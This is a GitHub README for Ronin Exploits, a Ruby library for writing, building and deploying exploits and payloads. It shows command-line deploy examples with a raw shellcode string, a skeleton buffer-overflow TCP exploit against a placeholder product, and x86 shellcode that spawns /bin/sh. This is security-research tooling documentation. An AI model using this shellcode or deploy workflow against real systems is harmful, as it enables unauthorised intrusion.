Skip to content

Ronin Exploits is a Ruby library for Ronin that provides exploitation and payload crafting functionality.

License

Notifications You must be signed in to change notification settings

xstpl/ronin-exploits

 
 

Repository files navigation

Ronin Exploits

Description

Ronin Exploits is a Ruby library for Ronin that provides exploitation and payload crafting functionality.

Ronin is a Ruby platform for exploit development and security research. Ronin allows for the rapid development and distribution of code, exploits or payloads over many common Source-Code-Management (SCM) systems.

Features

  • Define Exploits based on:
    • Whether they are local or remote.
    • Protocol they use.
    • Contributing authors.
    • Exploited behaviors.
    • Disclosure status.
    • Level of weaponization.
    • Architectures they target.
    • OSes they target.
    • Products they target.
  • Define Payloads based on:
    • Contributing authors.
    • Helpers they use.
  • Define Payload Encoders:
    • Architectures they target.
    • OSes they target.
  • Provides a simple three phase process of building, verifying and deploying Exploits and Payloads.
  • Allows adding arbitrary target data to the targets of Exploits.
  • Allows combining Payloads with Exploits.
  • Allows using a raw-payload with an Exploit.
  • Allows the addition of multiple Payload Encoders to an Exploit.
  • Allows chaining multiple Payloads together.
  • Provides the following Exploit classes:
    • {Ronin::Exploits::Exploit}
    • {Ronin::Exploits::Local}
    • {Ronin::Exploits::Remote}
    • {Ronin::Exploits::RemoteTCP}
    • {Ronin::Exploits::RemoteUDP}
    • {Ronin::Exploits::HTTP}
    • {Ronin::Exploits::FTP}
    • {Ronin::Exploits::Web}
    • {Ronin::Exploits::LFI}
    • {Ronin::Exploits::RFI}
    • {Ronin::Exploits::SQLi}
  • Provides the following Exploit helpers:
    • {Ronin::Exploits::Helpers::Binary}
    • {Ronin::Exploits::Helpers::Padding}
    • {Ronin::Exploits::Helpers::BufferOverflow}
    • {Ronin::Exploits::Helpers::FormatString}
    • {Ronin::Exploits::Helpers::FileBuilder}
  • Provides the following Payload classes:
    • {Ronin::Payloads::Payload}
    • {Ronin::Payloads::BinaryPayload}
    • {Ronin::Payloads::ASMPayload}
    • {Ronin::Payloads::Nops}
    • {Ronin::Payloads::Shellcode}
    • {Ronin::Payloads::BindShell}
  • Provides the following Payload helpers:
    • {Ronin::Payloads::Helpers::BindShell}
  • Provides an API for {Ronin::PostExploitation Post-Exploitation}.
  • Provides a multitude of exploit and payload generators which can create customized skeleton Ruby Exploits and Payloads.

Synopsis

Generate a skeleton exploit, with some custom information:

$ ronin-gen exploit example_exploit.rb \
    --name Example --arch i686 --os Linux --product "Example Product" \
    --status proven \
    --authors Postmodern --description "This is an example."
  • To generate other types of exploits specify one of the following:
    • local_exploit
    • remote_exploit
    • remote_tcp_exploit
    • remote_udp_exploit
    • ftp_exploit
    • http_exploit
    • web_exploit

Generate a skeleton payload, with some custom information:

$ ronin-gen payload example_payload.rb \
    --name Example --arch i686 --os Linux \
    --authors Postmodern --description "This is an example."
  • To generate other types of payloads specify one of the following:
    • binary_payload
    • shellcode
    • nops

List available exploits:

$ ronin-exploits

Print information about an exploit:

$ ronin-exploits -n NAME -v

Build and deploy an exploit:

$ ronin-exploit -n NAME --host example.com --port 9999

Load an exploit from a file, then build and deploy it:

$ ronin-exploit -f FILE --host example.com --port 9999

Build and deploy an exploit, with a payload:

$ ronin-exploit -n NAME --host example.com --port 9999 -P PAYLOAD_NAME

Build and deploy an exploit, with a raw payload:

$ ronin-exploit -n NAME --host example.com --port 9999 --raw-payload \
    `echo -en "\x66\x31\xc0\xfe\xc0\xb3\xff\xcd\x80"`

List available payloads:

$ ronin-payloads

Print information about a payload:

$ ronin-payloads -n NAME -v

Build and output a payload:

$ ronin-payload NAME

Build and output a raw unescaped payload:

$ ronin-payload NAME --raw

Load a payload from a file, then build and output it:

$ ronin-payload -f FILE

Examples

Define a remote TCP exploit:

require 'ronin/exploits/remote_tcp'

Ronin::Exploits::RemoteTCP.object do

  helper :buffer_overflow

  #
  # Cacheable data.
  #
  cache do
    self.name        = 'test'
    self.description = %{This is an example exploit.}

    self.status      = :potential
    self.released    = true

    author name: 'Postmodern', organization: 'SophSec'

    targeting do |t|
      t.targets_arch     :x86
      t.targets_os       'Linux'
      t.targets_software 'ExampleWare', '2.4.7b'
    end
  end

  #
  # Builds the exploit.
  #
  build do
    @buffer = "USER #{build_buffer}\n"
  end

  #
  # Deploys the built exploit.
  #
  deploy do
    tcp_send @buffer
  end

  #
  # Evacuates the deployed exploit.
  #
  evacuate do
    tcp_send "QUIT"
  end

end

Define a shellcode payload:

require 'ronin/payloads/shellcode'

Ronin::Payloads::Shellcode.object do

  cache do
    self.name        = 'local_shell'
    self.version     = '0.5'
    self.description = %{
      Shellcode that spawns a local /bin/sh shell
    }

    targets_arch :x86
    targets_os   'Linux'
  end

  build do
    shellcode do
      xor   eax, eax
      push  eax
      push  0x68732f2f
      push  0x6e69622f
      mov   esp, ebx
      push  eax
      push  ebx
      mov   esp, ecx
      xor   edx, edx
      int   0xb
    end
  end

end

Define a payload encoder:

require 'ronin/encoders/encoder'

Ronin::Encoders::Encoder.object do

  #
  # Cacheable data.
  #
  cache do
    self.name        = 'base64_encode'
    self.description = %{Example base64 payload encoder}

    self.targets_arch :x86
    self.targets_os   'Linux'
  end

  #
  # Base64 encodes the specified data.
  #
  def encode(data)
    return data.to_s.base64_encode
  end

end

Requirements

Install

Stable

$ gem install ronin-exploits

Edge

$ git clone git://github.com/ronin-ruby/ronin-exploits.git
$ cd ronin-exploits/
$ bundle install
$ ./bin/ronin-exploit --help

License

Ronin Exploits - A Ruby library for Ronin that provides exploitation and payload crafting functionality.

Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)

This file is part of Ronin Exploits.

Ronin is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

Ronin is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with Ronin. If not, see http://www.gnu.org/licenses/.

About

Ronin Exploits is a Ruby library for Ronin that provides exploitation and payload crafting functionality.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Ruby 93.1%
  • JavaScript 3.0%
  • PHP 2.7%
  • HTML 1.2%